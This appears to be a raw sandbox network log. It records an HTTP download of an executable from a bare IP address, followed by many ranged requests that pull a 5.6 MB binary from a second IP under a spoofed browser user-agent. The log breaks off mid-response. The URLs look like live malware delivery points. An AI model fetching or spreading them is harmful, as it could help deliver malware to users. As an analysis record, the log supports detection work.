x-frame-options: SAMEORIGIN
cf-chl-out: 6cmbTxdDyst80MSKRnBqTCGK33IpI6wIxptnY+cVNEt8/IsAHl8Ify2fMeEKvJgrG9SwHMHUDJPxIXY7IG10Buug65ehqis2WODwWOhYMkI833YAsWeSzFC5Y9G4jUWNhaZK2y3i+JGS37sH015nAQ==$S7QSuJNqCA+5j3mNnBwMZA==
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F%2B9aprT5giJC4F5kj7uDLCM3rHFIHv0WRyKzOS0feMoBM9GSrVhwRUaswSE61Zv4WdKVz5rjRd2bv3bZl%2FRYZgZ%2F%2Fnu3qZ9hSzcjqO7H463bmM2g5WNvVCR%2FitZZ6w%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 926973297edc94a0-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=43524&min_rtt=42163&rtt_var=11243&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3286&recv_bytes=507&delivery_rate=86334&cwnd=253&unsent_bytes=0&cid=18d2fc10f55301c5&ts=110&x=0"
GET

http://176.113.115.7/files/7033027882/TbV75ZR.exe

Request

GET /files/7033027882/TbV75ZR.exe HTTP/1.1
Host: 176.113.115.7

Response

HTTP/1.1 200 OK

Date: Wed, 26 Mar 2025 20:38:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Wed, 26 Mar 2025 12:41:50 GMT
ETag: "16ffc6-6313e2942c989"
Accept-Ranges: bytes
Content-Length: 1507270
Content-Type: application/x-msdos-program
HEAD

http://104.168.28.10/003/01/d1

Request

HEAD /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=0-0
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:14 GMT
Content-Type: application/octet-stream
Content-Length: 1
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 0-0/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=0-16383
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 16384
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 0-16383/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=131072-163839
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 32768
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 131072-163839/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=393216-458751
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 65536
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 393216-458751/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=917504-1048575
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 131072
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 917504-1048575/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=5046272-5111807
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:23 GMT
Content-Type: application/octet-stream
Content-Length: 65536
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 5046272-5111807/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=5373952-5505023
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:23 GMT
Content-Type: application/octet-stream
Content-Length: 131072
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 5373952-5505023/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=16384-32767
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 16384
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 16384-32767/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=229376-262143
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 32768
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 229376-262143/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=589824-655359
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 65536
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 589824-655359/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=1310720-1441791
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 131072
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 1310720-1441791/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=2228224-2490367
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 262144
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 2228224-2490367/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=5242880-5373951
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:23 GMT
Content-Type: application/octet-stream
Content-Length: 131072
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 5242880-5373951/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=32768-49151
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 16384
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 32768-49151/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=163840-196607
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 32768
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 163840-196607/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=458752-524287
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 65536
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 458752-524287/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=1048576-1179647
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 131072
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 1048576-1179647/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=4718592-4784127
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:22 GMT
Content-Type: application/octet-stream
Content-Length: 65536
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 4718592-4784127/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=5111808-5242879
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:23 GMT
Content-Type: application/octet-stream
Content-Length: 131072
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 5111808-5242879/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=49152-65535
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 16384
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 49152-65535/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=262144-294911
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 32768
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 262144-294911/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=655360-720895
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 65536
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 655360-720895/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=1441792-1572863
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 131072
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 1441792-1572863/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=3014656-3276799
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:21 GMT
Content-Type: application/octet-stream
Content-Length: 262144
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 3014656-3276799/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=4325376-4456447
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:22 GMT
Content-Type: application/octet-stream
Content-Length: 131072
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 4325376-4456447/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=4456448-4718591
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:22 GMT
Content-Type: application/octet-stream
Content-Length: 262144
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 4456448-4718591/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=65536-81919
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 16384
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 65536-81919/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=196608-229375
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 32768
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 196608-229375/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=524288-589823
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 65536
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 524288-589823/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=1179648-1310719
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 131072
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 1179648-1310719/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=1966080-2228223
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 262144
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 1966080-2228223/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=81920-98303
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 16384
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 81920-98303/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=294912-327679
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 32768
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 294912-327679/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=720896-786431
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 65536
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 720896-786431/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=1703936-1835007
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 131072
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 1703936-1835007/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=98304-114687
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 16384
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 98304-114687/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=360448-393215
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 32768
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 360448-393215/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=851968-917503
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 65536
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 851968-917503/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=1835008-1966079
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 131072
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 1835008-1966079/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=2490368-2752511
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 262144
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 2490368-2752511/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=3276800-3801087
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:22 GMT
Content-Type: application/octet-stream
Content-Length: 524288
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 3276800-3801087/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=114688-131071
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 16384
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 114688-131071/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=327680-360447
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:19 GMT
Content-Type: application/octet-stream
Content-Length: 32768
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 327680-360447/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=786432-851967
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 65536
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 786432-851967/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=1572864-1703935
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:20 GMT
Content-Type: application/octet-stream
Content-Length: 131072
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 1572864-1703935/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=2752512-3014655
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:21 GMT
Content-Type: application/octet-stream
Content-Length: 262144
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 2752512-3014655/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=3801088-4325375
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
Date: Wed, 26 Mar 2025 20:38:21 GMT
Content-Type: application/octet-stream
Content-Length: 524288
Last-Modified: Wed, 12 Mar 2025 06:33:02 GMT
Connection: keep-alive
ETag: "67d12a9e-558bf0"
Content-Range: bytes 3801088-4325375/5606384
GET

http://104.168.28.10/003/01/d1

Request

GET /003/01/d1 HTTP/1.1
Host: 104.168.28.10
Range: bytes=4784128-5046271
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:21.0) Gecko/20100101 Firefox/10.3
Accept: */*

Response

HTTP/1.1 206 Partial Content

Server: nginx/1.22.1
